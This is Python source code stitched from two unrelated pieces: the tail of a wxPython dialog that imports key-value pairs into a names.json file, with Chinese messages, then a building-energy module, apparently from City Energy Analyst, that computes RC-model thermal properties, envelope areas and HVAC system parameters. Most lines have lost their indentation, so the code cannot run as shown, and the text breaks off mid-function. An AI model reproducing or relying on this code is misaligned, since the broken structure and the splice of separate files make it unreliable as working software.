wx.FD_FILE_MUST_EXIST | wx.FD_OPEN)
        if dialog.ShowModal() == wx.ID_OK:
try:
with open(dialog.GetPath(), "r")as file:
temple = json.load(file)
for key, item in temple.items():
if not isinstance(item, str):
raise TypeError("不可用文件")
self.edit_group[key] = item
if key in self.key_group:
overwrite += 1
index = self.key_group.index(key)
self.m_listBox_name_exist.SetString(index, self.string_format(key, item))
else:
new_item += 1
self.m_listBox_name_exist.Append(self.string_format(key, item))
wx.MessageBox(f"导入键值对文件成功!\n\t覆盖:{overwrite}\n\t新增:{new_item}", "信息")
self.is_changed=True
except Exception as info:
wx.MessageBox(f"导入键值对文件出现错误!\n{info.__str__()}")
def close_save(self, event):
if self.is_changed:
feedback = wx.MessageBox("要应用这些变化吗?", "信息", wx.ICON_INFORMATION | wx.YES_NO)
if feedback == wx.YES:
                save_data = {k.lower(): v for k, v in self.edit_group.items()}
                with open(os.path.join(self.path, "core\\assets\\names.json"), "w") as file:
json.dump(save_data, file, indent=4)
self.names = dict(self.edit_group)
super(NamesEditFrame, self).close_save(event)
|
"""
Classes of building properties
"""
import numpy as np
import pandas as pd
from geopandas import GeoDataFrame as Gdf
from datetime import datetime
from collections import namedtuple
from cea.demand import constants
import cea.config
from cea.utilities.dbf import dbf_to_dataframe
from cea.technologies import blinds
from typing import List
__author__ = "Gabriel Happle"
__copyright__ = "Copyright 2017, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Gabriel Happle", "Jimeno A. Fonseca", "Daren Thomas", "Jack Hawthorne", "Reynold Mok"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
# import constants
H_F = constants.H_F
RSE = constants.RSE
H_MS = constants.H_MS
H_IS = constants.H_IS
B_F = constants.B_F
LAMBDA_AT = constants.LAMBDA_AT
class BuildingProperties(object):
"""
Groups building properties used for the calc-thermal-loads functions. Stores the full DataFrame for each of the
building properties and provides methods for indexing them by name.
G. Happle BuildingPropsThermalLoads 27.05.2016
"""
def __init__(self, locator, building_names=None):
"""
Read building properties from input shape files and construct a new BuildingProperties object.
:param locator: an InputLocator for locating the input files
:type locator: cea.inputlocator.InputLocator
:param List[str] building_names: list of buildings to read properties
:returns: BuildingProperties
:rtype: BuildingProperties
"""
if building_names is None:
building_names = locator.get_zone_building_names()
self.building_names = building_names
print("read input files")
prop_geometry = Gdf.from_file(locator.get_zone_geometry())
prop_geometry['footprint'] = prop_geometry.area
prop_geometry['perimeter'] = prop_geometry.length
prop_geometry['Blength'], prop_geometry['Bwidth'] = self.calc_bounding_box_geom(locator.get_zone_geometry())
prop_geometry = prop_geometry.drop('geometry', axis=1).set_index('Name')
prop_hvac = dbf_to_dataframe(locator.get_building_air_conditioning())
prop_typology = dbf_to_dataframe(locator.get_building_typology()).set_index('Name')
# Drop 'REFERENCE' column if it exists
if 'REFERENCE' in prop_typology:
            prop_typology.drop('REFERENCE', axis=1, inplace=True)
prop_architectures = dbf_to_dataframe(locator.get_building_architecture())
prop_comfort = dbf_to_dataframe(locator.get_building_comfort()).set_index('Name')
prop_internal_loads = dbf_to_dataframe(locator.get_building_internal()).set_index('Name')
prop_supply_systems_building = dbf_to_dataframe(locator.get_building_supply())
# GET SYSTEMS EFFICIENCIES
prop_supply_systems = get_properties_supply_sytems(locator, prop_supply_systems_building).set_index(
'Name')
# get temperatures of operation
prop_HVAC_result = get_properties_technical_systems(locator, prop_hvac).set_index('Name')
# get envelope properties
prop_envelope = get_envelope_properties(locator, prop_architectures).set_index('Name')
# get properties of rc demand model
prop_rc_model = self.calc_prop_rc_model(locator, prop_typology, prop_envelope,
prop_geometry, prop_HVAC_result)
# get solar properties
solar = get_prop_solar(locator, building_names, prop_rc_model, prop_envelope).set_index('Name')
# df_windows = geometry_reader.create_windows(surface_properties, prop_envelope)
        # TODO: check whether the Win_op and height of window are necessary.
        # TODO: maybe merging branch i9 with CityGML could help with this
print("done")
# save resulting data
self._prop_supply_systems = prop_supply_systems
self._prop_geometry = prop_geometry
self._prop_envelope = prop_envelope
self._prop_typology = prop_typology
self._prop_HVAC_result = prop_HVAC_result
self._prop_comfort = prop_comfort
self._prop_internal_loads = prop_internal_loads
self._prop_age = prop_typology[['YEAR']]
self._solar = solar
self._prop_RC_model = prop_rc_model
def calc_bounding_box_geom(self, geometry_shapefile):
import shapefile
sf = shapefile.Reader(geometry_shapefile)
shapes = sf.shapes()
len_shapes = len(shapes)
bwidth = []
blength = []
for shape in range(len_shapes):
bbox = shapes[shape].bbox
coords_bbox = [coord for coord in bbox]
delta1 = abs(coords_bbox[0] - coords_bbox[2])
delta2 = abs(coords_bbox[1] - coords_bbox[3])
if delta1 >= delta2:
bwidth.append(delta2)
blength.append(delta1)
else:
bwidth.append(delta1)
blength.append(delta2)
return blength, bwidth
def __len__(self):
"""return length of list_building_names"""
return len(self.building_names)
def list_building_names(self):
"""get list of all building names"""
return self.building_names
def list_uses(self):
"""get list of all uses (typology types)"""
return list(set(self._prop_typology['USE'].values))
def get_prop_supply_systems(self, name_building):
"""get geometry of a building by name"""
return self._prop_supply_systems.loc[name_building].to_dict()
def get_prop_geometry(self, name_building):
"""get geometry of a building by name"""
return self._prop_geometry.loc[name_building].to_dict()
def get_prop_envelope(self, name_building):
"""get the architecture and thermal properties of a building by name"""
return self._prop_envelope.loc[name_building].to_dict()
def get_prop_typology(self, name_building):
"""get the typology properties of a building by name"""
return self._prop_typology.loc[name_building].to_dict()
def get_prop_hvac(self, name_building):
"""get HVAC properties of a building by name"""
return self._prop_HVAC_result.loc[name_building].to_dict()
def get_prop_rc_model(self, name_building):
"""get RC-model properties of a building by name"""
return self._prop_RC_model.loc[name_building].to_dict()
def get_prop_comfort(self, name_building):
"""get comfort properties of a building by name"""
return self._prop_comfort.loc[name_building].to_dict()
def get_prop_internal_loads(self, name_building):
"""get internal loads properties of a building by name"""
return self._prop_internal_loads.loc[name_building].to_dict()
def get_prop_age(self, name_building):
"""get age properties of a building by name"""
return self._prop_age.loc[name_building].to_dict()
def get_solar(self, name_building):
"""get solar properties of a building by name"""
return self._solar.loc[name_building]
def calc_prop_rc_model(self, locator, typology, envelope, geometry, hvac_temperatures):
"""
Return the RC model properties for all buildings. The RC model used is described in ISO 13790:2008, Annex C (Full
set of equations for simple hourly method).
        :param typology: The contents of the `typology.shp` file, indexed by building name. Each column is the name of a
            typology type (GYM, HOSPITAL, HOTEL, INDUSTRIAL, MULTI_RES, OFFICE, PARKING, etc.) except for the
"PFloor" column which is a fraction of heated floor area.
The typology types must add up to 1.0.
:type typology: Gdf
:param envelope: The contents of the `architecture.shp` file, indexed by building name.
It contains the following fields:
- n50: Air tightness at 50 Pa [h^-1].
- type_shade: shading system type.
- win_wall: window to wall ratio.
- U_base: U value of the floor construction [W/m2K]
- U_roof: U value of roof construction [W/m2K]
- U_wall: U value of wall construction [W/m2K]
- U_win: U value of window construction [W/m2K]
- Hs: Fraction of gross floor area that is heated/cooled {0 <= Hs <= 1}
- Cm_Af: Internal heat capacity per unit of area [J/K.m2]
:type envelope: Gdf
:param geometry: The contents of the `zone.shp` file indexed by building name - the list of buildings, their floor
counts, heights etc.
Includes additional fields "footprint" and "perimeter" as calculated in `read_building_properties`.
:type geometry: Gdf
:param hvac_temperatures: The return value of `get_properties_technical_systems`.
:type hvac_temperatures: DataFrame
:returns: RC model properties per building
:rtype: DataFrame
Sample result data calculated or manipulated by this method:
Name: B153767
datatype: float64
========= ============ ================================================================================================
Column e.g. Description
========= ============ ================================================================================================
Atot 4.564827e+03 (area of all surfaces facing the building zone in [m2])
Aw 4.527014e+02 (area of windows in [m2])
Am 6.947967e+03 (effective mass area in [m2])
Aef 2.171240e+03 (floor area with electricity in [m2])
Af 2.171240e+03 (conditioned floor area (heated/cooled) in [m2])
Cm 6.513719e+08 (internal heat capacity in [J/k])
Htr_is 1.574865e+04 (thermal transmission coefficient between air and surface nodes in RC-model in [W/K])
Htr_em 5.829963e+02 (thermal transmission coefficient between exterior and thermal mass nodes in RC-model in [W/K])
Htr_ms 6.322650e+04 (thermal transmission coefficient between surface and thermal mass nodes in RC-model in [W/K])
Htr_op 5.776698e+02 (thermal transmission coefficient for opaque surfaces in [W/K])
Hg 2.857637e+02 (steady-state thermal transmission coefficient to the ground in [W/K])
HD 2.919060e+02 (direct thermal transmission coefficient to the external environment in [W/K])
Htr_w 1.403374e+03 (thermal transmission coefficient for windows and glazing in [W/K])
========= ============ ================================================================================================
FIXME: rename Awall_all to something more sane...
"""
# calculate building geometry
df = self.geometry_reader_radiation_daysim(locator, envelope, geometry)
df = df.merge(typology, left_index=True, right_index=True)
df = df.merge(hvac_temperatures, left_index=True, right_index=True)
from cea.demand.control_heating_cooling_systems import has_heating_system, has_cooling_system
for building in self.building_names:
has_system_heating_flag = has_heating_system(hvac_temperatures.loc[building, 'class_hs'])
has_system_cooling_flag = has_cooling_system(hvac_temperatures.loc[building, 'class_cs'])
if (not has_system_heating_flag and not has_system_cooling_flag and
np.max([df.loc[building, 'Hs_ag'], df.loc[building, 'Hs_bg']]) <= 0.0):
df.loc[building, 'Hs_ag'] = 0.0
df.loc[building, 'Hs_bg'] = 0.0
print('Building {building} has no heating and cooling system, Hs corrected to 0.'.format(
building=building))
df = calc_useful_areas(df)
if 'Cm_Af' in self.get_overrides_columns():
# Internal heat capacity is not part of input, calculate [J/K]
df['Cm'] = self._overrides['Cm_Af'] * df['Af']
else:
df['Cm'] = df['Cm_Af'] * df['Af']
df['Am'] = df['Cm_Af'].apply(self.lookup_effective_mass_area_factor) * df['Af'] # Effective mass area in [m2]
# Steady-state Thermal transmittance coefficients and Internal heat Capacity
# Thermal transmission coefficient for windows and glazing in [W/K]
# Weigh area of windows with fraction of air-conditioned space, relationship of area and perimeter is squared
df['Htr_w'] = df['Awin_ag'] * df['U_win'] * np.sqrt(df['Hs_ag'])
# direct thermal transmission coefficient to the external environment in [W/K]
        # Weigh wall and roof areas with fraction of air-conditioned space, relationship of area and perimeter is squared
df['HD'] = df['Awall_ag'] * df['U_wall'] * np.sqrt(df['Hs_ag']) + df['Aroof'] * df['U_roof'] * df['Hs_ag']
# steady-state Thermal transmission coefficient to the ground. in W/K
df['Hg'] = B_F * df['Aop_bg'] * df['U_base'] * df['Hs_bg']
# calculate RC model properties
df['Htr_op'] = df['Hg'] + df['HD']
df['Htr_ms'] = H_MS * df['Am'] # Coupling conductance 1 in W/K
df['Htr_em'] = 1 / (1 / df['Htr_op'] - 1 / df['Htr_ms']) # Coupling conductance 2 in W/K
df['Htr_is'] = H_IS * df['Atot']
fields = ['Atot', 'Awin_ag', 'Am', 'Aef', 'Af', 'Cm', 'Htr_is', 'Htr_em', 'Htr_ms', 'Htr_op', 'Hg', 'HD', 'Aroof',
'U_wall', 'U_roof', 'U_win', 'U_base', 'Htr_w', 'GFA_m2', 'Aocc', 'Aop_bg', 'empty_envelope_ratio',
'Awall_ag', 'footprint']
result = df[fields]
return result
def geometry_reader_radiation_daysim(self, locator, envelope, geometry):
"""
Reader which returns the radiation specific geometries from Daysim. Adjusts the imported data such that it is
consistent with other imported geometry parameters.
:param locator: an InputLocator for locating the input files
:param envelope: The contents of the `architecture.shp` file, indexed by building name.
        :param geometry: The contents of the `zone.shp` file indexed by building name.
:return: Adjusted Daysim geometry data containing the following:
- Name: Name of building.
- Aw: Area of windows for each building (using mean window to wall ratio for building, excluding voids) [m2]
- Awall_ag: Opaque wall areas above ground (excluding voids, windows and roof) [m2]
- Aop_bg: Opaque areas below ground (including ground floor, excluding voids and windows) [m2]
- Aroof: Area of the roof (considered flat and equal to the building footprint) [m2]
- GFA_m2: Gross floor area [m2]
- floors: Sum of floors below ground (floors_bg) and floors above ground (floors_ag) [m2]
- surface_volume: Surface to volume ratio [m^-1]
:rtype: DataFrame
Data is read from :py:meth:`cea.inputlocator.InputLocator.get_radiation_metadata`
(e.g.
``C:/scenario/outputs/data/solar-radiation/{building_name}_geometry.csv``)
Note: File generated by the radiation script. It contains the fields Name, Freeheight, FactorShade, height_ag and
Shape_Leng. This data is used to calculate the wall and window areas.)
"""
# add result columns to envelope df
envelope['Awall_ag'] = np.nan
envelope['Awin_ag'] = np.nan
envelope['Aroof'] = np.nan
# call all building geometry files in a loop
for building_name in self.building_names:
geometry_data = pd.read_csv(locator.get_radiation_building(building_name))
envelope.loc[building_name, 'Awall_ag'] = geometry_data['walls_east_m2'][0] + \
geometry_data['walls_west_m2'][0] + \
geometry_data['walls_south_m2'][0] +\
geometry_data['walls_north_m2'][0]
envelope.loc[building_name, 'Awin_ag'] = geometry_data['windows_east_m2'][0] + \
geometry_data['windows_west_m2'][0] + \
geometry_data['windows_south_m2'][0] +\
geometry_data['windows_north_m2'][0]
envelope.loc[building_name, 'Aroof'] = geometry_data['roofs_top_m2'][0]
df = envelope.merge(geometry, left_index=True, right_index=True)
def calc_empty_envelope_ratio(void_deck_floors, height, floors, Awall, Awin):
if (Awall + Awin) > 0.0:
empty_envelope_ratio = 1 - ((void_deck_floors * (height / floors)) / (Awall + Awin))
else:
empty_envelope_ratio = 1
return empty_envelope_ratio
df['empty_envelope_ratio'] = df.apply(lambda x: calc_empty_envelope_ratio(x['void_deck'],
x['height_ag'],
x['floors_ag'],
x['Awall_ag'],
x['Awin_ag']), axis=1)
# adjust envelope areas with Void_deck
df['Awin_ag'] = df['Awin_ag'] * df['empty_envelope_ratio']
df['Awall_ag'] = df['Awall_ag'] * df['empty_envelope_ratio']
df['Aop_bg'] = df['height_bg'] * df['perimeter'] + df['footprint']
        # get other quantities.
df['floors'] = df['floors_bg'] + df['floors_ag']
df['GFA_m2'] = df['footprint'] * df['floors'] # gross floor area
df['GFA_ag_m2'] = df['footprint'] * df['floors_ag']
df['GFA_bg_m2'] = df['footprint'] * df['floors_bg']
return df
def lookup_effective_mass_area_factor(self, cm):
"""
Look up the factor to multiply the conditioned floor area by to get the effective mass area by building
construction type.
This is used for the calculation of the effective mass area "Am" in `get_prop_RC_model`.
Standard values can be found in the Annex G of ISO EN13790
:param: cm: The internal heat capacity per unit of area [J/m2].
:return: Effective mass area factor (0, 2.5 or 3.2 depending on cm value).
"""
if cm == 0.0:
return 0.0
elif 0.0 < cm <= 165000.0:
return 2.5
else:
return 3.2
def __getitem__(self, building_name):
"""return a (read-only) BuildingPropertiesRow for the building"""
return BuildingPropertiesRow(name=building_name,
geometry=self.get_prop_geometry(building_name),
envelope=self.get_prop_envelope(building_name),
typology=self.get_prop_typology(building_name),
hvac=self.get_prop_hvac(building_name),
rc_model=self.get_prop_rc_model(building_name),
comfort=self.get_prop_comfort(building_name),
internal_loads=self.get_prop_internal_loads(building_name),
age=self.get_prop_age(building_name),
solar=self.get_solar(building_name),
supply=self.get_prop_supply_systems(building_name))
def get_overrides_columns(self):
"""Return the list of column names in the `overrides.csv` file or an empty list if no such file
is present."""
if hasattr(self, '_overrides'):
return list(self._overrides.columns)
return []
def calc_useful_areas(df):
df['Aocc'] = df['GFA_m2'] * df['Ns'] # occupied floor area: all occupied areas in the building
# conditioned area: areas that are heated/cooled
df['Af'] = df['GFA_ag_m2'] * df['Hs_ag'] + df['GFA_bg_m2'] * df['Hs_bg']
df['Aef'] = df['GFA_m2'] * df['Es'] # electrified area: share of gross floor area that is also electrified
df['Atot'] = df['Af'] * LAMBDA_AT # area of all surfaces facing the building zone
return df
class BuildingPropertiesRow(object):
"""Encapsulate the data of a single row in the DataSets of BuildingProperties. This class meant to be
read-only."""
def __init__(self, name, geometry, envelope, typology, hvac,
rc_model, comfort, internal_loads, age, solar, supply):
"""Create a new instance of BuildingPropertiesRow - meant to be called by BuildingProperties[building_name].
Each of the arguments is a pandas Series object representing a row in the corresponding DataFrame."""
self.name = name
self.geometry = geometry
self.architecture = EnvelopeProperties(envelope)
self.typology = typology # FIXME: rename to uses!
self.hvac = hvac
self.rc_model = rc_model
self.comfort = comfort
self.internal_loads = internal_loads
self.age = age
self.solar = SolarProperties(solar)
self.supply = supply
self.building_systems = self._get_properties_building_systems()
def _get_properties_building_systems(self):
"""
Method for defining the building system properties, specifically the nominal supply and return temperatures,
equivalent pipe lengths and transmittance losses. The systems considered include an ahu (air
handling unit, rsu(air recirculation unit), and scu/shu (sensible cooling / sensible heating unit).
        Note: it is assumed that buildings with fewer than 2 floors above ground and fewer than 2 floors underground
        do not require heating and cooling circulation circuits, and these are not considered when calculating the building system properties.
:return: building_systems dict containing the following information:
Pipe Lengths:
- Lcww_dis: length of hot water piping in the distribution circuit (????) [m]
- Lsww_dis: length of hot water piping in the distribution circuit (????) [m]
- Lvww_dis: length of hot water piping in the distribution circuit (?????) [m]
- Lvww_c: length of piping in the heating system circulation circuit (ventilated/recirc?) [m]
- Lv: length vertical lines [m]
Heating Supply Temperatures:
- Ths_sup_ahu_0: heating supply temperature for AHU (C)
- Ths_sup_aru_0: heating supply temperature for ARU (C)
- Ths_sup_shu_0: heating supply temperature for SHU (C)
Heating Return Temperatures:
- Ths_re_ahu_0: heating return temperature for AHU (C)
- Ths_re_aru_0: heating return temperature for ARU (C)
- Ths_re_shu_0: heating return temperature for SHU (C)
Cooling Supply Temperatures:
- Tcs_sup_ahu_0: cooling supply temperature for AHU (C)
- Tcs_sup_aru_0: cooling supply temperature for ARU (C)
- Tcs_sup_scu_0: cooling supply temperature for SCU (C)
Cooling Return Temperatures:
- Tcs_re_ahu_0: cooling return temperature for AHU (C)
- Tcs_re_aru_0: cooling return temperature for ARU (C)
- Tcs_re_scu_0: cooling return temperature for SCU (C)
Water supply temperature??:
- Tww_sup_0: ?????
Thermal losses in pipes:
            - Y: Linear transmissivity coefficients of piping depending on year of construction [W/m.K]
Form Factor Adjustment:
- fforma: form factor comparison between real surface and rectangular ???
:rtype: dict
"""
# Refactored from CalcThermalLoads
        # geometry properties.
Ll = self.geometry['Blength']
Lw = self.geometry['Bwidth']
nf_ag = self.geometry['floors_ag']
nf_bg = self.geometry['floors_bg']
phi_pipes = self._calculate_pipe_transmittance_values()
# nominal temperatures
Ths_sup_ahu_0 = float(self.hvac['Tshs0_ahu_C'])
Ths_re_ahu_0 = float(Ths_sup_ahu_0 - self.hvac['dThs0_ahu_C'])
Ths_sup_aru_0 = float(self.hvac['Tshs0_aru_C'])
Ths_re_aru_0 = float(Ths_sup_aru_0 - self.hvac['dThs0_aru_C'])
Ths_sup_shu_0 = float(self.hvac['Tshs0_shu_C'])
Ths_re_shu_0 = float(Ths_sup_shu_0 - self.hvac['dThs0_shu_C'])
Tcs_sup_ahu_0 = self.hvac['Tscs0_ahu_C']
Tcs_re_ahu_0 = Tcs_sup_ahu_0 + self.hvac['dTcs0_ahu_C']
Tcs_sup_aru_0 = self.hvac['Tscs0_aru_C']
Tcs_re_aru_0 = Tcs_sup_aru_0 + self.hvac['dTcs0_aru_C']
Tcs_sup_scu_0 = self.hvac['Tscs0_scu_C']
Tcs_re_scu_0 = Tcs_sup_scu_0 + self.hvac['dTcs0_scu_C']
Tww_sup_0 = self.hvac['Tsww0_C']
        # Identification of equivalent lengths
fforma = self._calc_form() # factor form comparison real surface and rectangular
Lv = (2 * Ll + 0.0325 * Ll * Lw + 6) * fforma # length vertical lines
        if nf_ag < 2 and nf_bg < 2:  # it is assumed that buildings with fewer than two floors above ground and fewer than two floors below ground do not have circulation circuits
Lcww_dis = 0
Lvww_c = 0
else:
Lcww_dis = 2 * (Ll + 2.5 + nf_ag * H_F) * fforma # length hot water piping circulation circuit
Lvww_c = (2 * Ll + 0.0125 * Ll * Lw) * fforma # length piping heating system circulation circuit
Lsww_dis = 0.038 * Ll * Lw * nf_ag * H_F * fforma # length hot water piping distribution circuit
Lvww_dis = (Ll + 0.0625 * Ll * Lw) * fforma # length piping heating system distribution circuit
building_systems = pd.Series({'Lcww_dis': Lcww_dis,
'Lsww_dis': Lsww_dis,
'Lv': Lv,
'Lvww_c': Lvww_c,
'Lvww_dis': Lvww_dis,
'Ths_sup_ahu_0': Ths_sup_ahu_0,
'Ths_re_ahu_0': Ths_re_ahu_0,
'Ths_sup_aru_0': Ths_sup_aru_0,
'Ths_re_aru_0': Ths_re_aru_0,
'Ths_sup_shu_0': Ths_sup_shu_0,
'Ths_re_shu_0': Ths_re_shu_0,
'Tcs_sup_ahu_0': Tcs_sup_ahu_0,
'Tcs_re_ahu_0': Tcs_re_ahu_0,
'Tcs_sup_aru_0': Tcs_sup_aru_0,
'Tcs_re_aru_0': Tcs_re_aru_0,
'Tcs_sup_scu_0': Tcs_sup_scu_0,
'Tcs_re_scu_0': Tcs_re_scu_0,
'Tww_sup_0': Tww_sup_0,
'Y': phi_pipes,
'fforma': fforma})
return building_systems
def _calculate_pipe_transmittance_values(self):
"""linear trasmissivity coefficients of piping W/(m.K)"""
if self.age['YEAR'] >= 1995:
phi_pipes = [0.2, 0.3, 0.3]
# elif 1985 <= self.age['built'] < 1995 and self.age['HVAC'] == 0:
elif 1985 <= self.age['YEAR'] < 1995:
phi_pipes = [0.3, 0.4, 0.4]
else:
phi_pipes = [0.4, 0.4, 0.4]
return phi_pipes
def _calc_form(self):
factor = self.geometry['footprint'] / (self.geometry['Bwidth'] * self.geometry['Blength'])
return factor
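    # Illustrative example: a footprint of 800 m2 inside a 40 m x 25 m bounding rectangle
    # (Bwidth * Blength = 1000 m2) gives a form factor of 800 / 1000 = 0.8.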
def weird_division(n, d):
return n / d if d else 0.0
class EnvelopeProperties(object):
"""Encapsulate a single row of the architecture input file for a building"""
def __init__(self, envelope):
self.A_op = envelope['Awin_ag'] + envelope['Awall_ag']
self.a_roof = envelope['a_roof']
self.n50 = envelope['n50']
self.win_wall = weird_division(envelope['Awin_ag'], self.A_op)
self.a_wall = envelope['a_wall']
self.rf_sh = envelope['rf_sh']
self.e_wall = envelope['e_wall']
self.e_roof = envelope['e_roof']
self.G_win = envelope['G_win']
self.e_win = envelope['e_win']
self.U_roof = envelope['U_roof']
self.Hs_ag = envelope['Hs_ag']
self.Hs_bg = envelope['Hs_bg']
self.Ns = envelope['Ns']
self.Es = envelope['Es']
self.Cm_Af = envelope['Cm_Af']
self.U_wall = envelope['U_wall']
self.U_base = envelope['U_base']
self.U_win = envelope['U_win']
class SolarProperties(object):
"""Encapsulates the solar properties of a building"""
__slots__ = ['I_sol']
def __init__(self, solar):
self.I_sol = solar['I_sol']
def get_properties_supply_sytems(locator, properties_supply):
data_all_in_one_systems = pd.read_excel(locator.get_database_supply_assemblies(), sheet_name=None)
supply_heating = data_all_in_one_systems['HEATING']
supply_dhw = data_all_in_one_systems['HOT_WATER']
supply_cooling = data_all_in_one_systems['COOLING']
supply_electricity = data_all_in_one_systems['ELECTRICITY']
df_emission_heating = properties_supply.merge(supply_heating, left_on='type_hs', right_on='code')
df_emission_cooling = properties_supply.merge(supply_cooling, left_on='type_cs', right_on='code')
df_emission_dhw = properties_supply.merge(supply_dhw, left_on='type_dhw', right_on='code')
df_emission_electricity = properties_supply.merge(supply_electricity, left_on='type_el', right_on='code')
df_emission_heating.rename(columns={"feedstock": "source_hs", "scale": "scale_hs", "efficiency": "eff_hs"},
inplace=True)
df_emission_cooling.rename(columns={"feedstock": "source_cs", "scale": "scale_cs", "efficiency": "eff_cs"},
inplace=True)
df_emission_dhw.rename(columns={"feedstock": "source_dhw", "scale": "scale_dhw", "efficiency": "eff_dhw"},
inplace=True)
df_emission_electricity.rename(columns={"feedstock": "source_el", "scale": "scale_el", "efficiency": "eff_el"},
inplace=True)
fields_emission_heating = ['Name', 'type_hs', 'type_cs', 'type_dhw', 'type_el',
'source_hs', 'scale_hs', 'eff_hs']
fields_emission_cooling = ['Name', 'source_cs', 'scale_cs', 'eff_cs']
fields_emission_dhw = ['Name', 'source_dhw', 'scale_dhw', 'eff_dhw']
fields_emission_el = ['Name', 'source_el', 'scale_el', 'eff_el']
result = df_emission_heating[fields_emission_heating].merge(df_emission_cooling[fields_emission_cooling],
on='Name').merge(
df_emission_dhw[fields_emission_dhw], on='Name').merge(df_emission_electricity[fields_emission_el], on='Name')
return result
def get_properties_technical_systems(locator, prop_HVAC):
"""
    Return temperature data per building based on the HVAC systems of the building. Uses the air-conditioning
    systems database (read via ``locator.get_database_air_conditioning_systems()``) to look up properties.
:param locator: an InputLocator for locating the input files
:type locator: cea.inputlocator.InputLocator
    :param prop_HVAC: HVAC properties for each building (type of cooling system, control system, domestic hot water
        system and heating system).
:type prop_HVAC: geopandas.GeoDataFrame
Sample data (first 5 rows)::
Name type_cs type_ctrl type_dhw type_hs type_vent
0 B154862 T0 T1 T1 T1 T0
1 B153604 T0 T1 T1 T1 T0
2 B153831 T0 T1 T1 T1 T0
3 B302022960 T0 T0 T0 T0 T0
4 B302034063 T0 T0 T0 T0 T0
    :returns: A DataFrame containing temperature data for each building in the scenario.
    :rtype: DataFrame
Each row contains the following fields:
========== ======= ===========================================================================
Column e.g. Description
========== ======= ===========================================================================
Name B154862 (building name)
type_hs T1 (copied from input, code for type of heating system)
type_cs T0 (copied from input, code for type of cooling system)
type_dhw T1 (copied from input, code for type of hot water system)
type_ctrl T1 (copied from input, code for type of controller for heating and cooling system)
type_vent T1 (copied from input, code for type of ventilation system)
Tshs0_C 90 (heating system supply temperature at nominal conditions [C])
dThs0_C 20 (delta of heating system temperature at nominal conditions [C])
Qhsmax_Wm2 500 (maximum heating system power capacity per unit of gross built area [W/m2])
dThs_C 0.15 (correction temperature of emission losses due to type of heating system [C])
Tscs0_C 0 (cooling system supply temperature at nominal conditions [C])
dTcs0_C 0 (delta of cooling system temperature at nominal conditions [C])
Qcsmax_Wm2 0 (maximum cooling system power capacity per unit of gross built area [W/m2])
dTcs_C 0.5 (correction temperature of emission losses due to type of cooling system [C])
dT_Qhs 1.2 (correction temperature of emission losses due to control system of heating [C])
dT_Qcs -1.2 (correction temperature of emission losses due to control system of cooling[C])
Tsww0_C 60 (dhw system supply temperature at nominal conditions [C])
Qwwmax_Wm2 500 (maximum dwh system power capacity per unit of gross built area [W/m2])
MECH_VENT True (copied from input, ventilation system configuration)
WIN_VENT False (copied from input, ventilation system configuration)
HEAT_REC True (copied from input, ventilation system configuration)
NIGHT_FLSH True (copied from input, ventilation system control strategy)
ECONOMIZER False (copied from input, ventilation system control strategy)
========== ======= ===========================================================================
    Data is read from :py:meth:`cea.inputlocator.InputLocator.get_database_air_conditioning_systems`.
"""
prop_emission_heating = pd.read_excel(locator.get_database_air_conditioning_systems(), 'HEATING')
prop_emission_cooling = pd.read_excel(locator.get_database_air_conditioning_systems(), 'COOLING')
prop_emission_dhw = pd.read_excel(locator.get_database_air_conditioning_systems(), 'HOT_WATER')
prop_emission_control_heating_and_cooling = pd.read_excel(locator.get_database_air_conditioning_systems(),
'CONTROLLER')
prop_ventilation_system_and_control = pd.read_excel(locator.get_database_air_conditioning_systems(), 'VENTILATION')
df_emission_heating = prop_HVAC.merge(prop_emission_heating, left_on='type_hs', right_on='code')
df_emission_cooling = prop_HVAC.merge(prop_emission_cooling, left_on='type_cs', right_on='code')
df_emission_control_heating_and_cooling = prop_HVAC.merge(prop_emission_control_heating_and_cooling,
left_on='type_ctrl', right_on='code')
df_emission_dhw = prop_HVAC.merge(prop_emission_dhw, left_on='type_dhw', right_on='code')
df_ventilation_system_and_control = prop_HVAC.merge(prop_ventilation_system_and_control, left_on='type_vent',
right_on='code')
fields_emission_heating = ['Name', 'type_hs', 'type_cs', 'type_dhw', 'type_ctrl', 'type_vent', 'heat_starts',
'heat_ends', 'cool_starts', 'cool_ends', 'class_hs', 'convection_hs',
'Qhsmax_Wm2', 'dThs_C', 'Tshs0_ahu_C', 'dThs0_ahu_C', 'Th_sup_air_ahu_C', 'Tshs0_aru_C',
'dThs0_aru_C', 'Th_sup_air_aru_C', 'Tshs0_shu_C', 'dThs0_shu_C']
fields_emission_cooling = ['Name', 'Qcsmax_Wm2', 'dTcs_C', 'Tscs0_ahu_C', 'dTcs0_ahu_C', 'Tc_sup_air_ahu_C',
'Tscs0_aru_C', 'dTcs0_aru_C', 'Tc_sup_air_aru_C', 'Tscs0_scu_C', 'dTcs0_scu_C',
'class_cs', 'convection_cs']
fields_emission_control_heating_and_cooling = ['Name', 'dT_Qhs', 'dT_Qcs']
fields_emission_dhw = ['Name', 'Tsww0_C', 'Qwwmax_Wm2']
fields_system_ctrl_vent = ['Name', 'MECH_VENT', 'WIN_VENT', 'HEAT_REC', 'NIGHT_FLSH', 'ECONOMIZER']
result = df_emission_heating[fields_emission_heating].merge(df_emission_cooling[fields_emission_cooling],
on='Name').merge(
df_emission_control_heating_and_cooling[fields_emission_control_heating_and_cooling],
on='Name').merge(df_emission_dhw[fields_emission_dhw],
on='Name').merge(df_ventilation_system_and_control[fields_system_ctrl_vent], on='Name')
# read region-specific control parameters (identical for all buildings), i.e. heating and cooling season
result['has-heating-season'] = result.apply(lambda x: verify_has_season(x['Name'],
x['heat_starts'],
x['heat_ends']), axis=1)
result['has-cooling-season'] = result.apply(lambda x: verify_has_season(x['Name'],
x['cool_starts'],
x['cool_ends']), axis=1)
# verify seasons do not overlap
result['overlap-season'] = result.apply(lambda x: verify_overlap_season(x['Name'],
x['has-heating-season'],
x['has-cooling-season'],
x['heat_starts'],
x['heat_ends'],
x['cool_starts'],
x['cool_ends']), axis=1)
return result
def verify_overlap_season(building_name, has_heating_season, has_cooling_season, heat_start, heat_end, cool_start,
                          cool_end):
    if has_cooling_season and has_heating_season:
Range = namedtuple('Range', ['start', 'end'])
# for heating
day1, month1 = map(int, heat_start.split('|'))
day2, month2 = map(int, heat_end.split('|'))
if month2 > month1:
r1 = Range(start=datetime(2012, month1, day1), end=datetime(2012, month2, day2))
else:
r1 = Range(start=datetime(2012, month1, day1), end=datetime(2013, month2, day2))
# for cooling
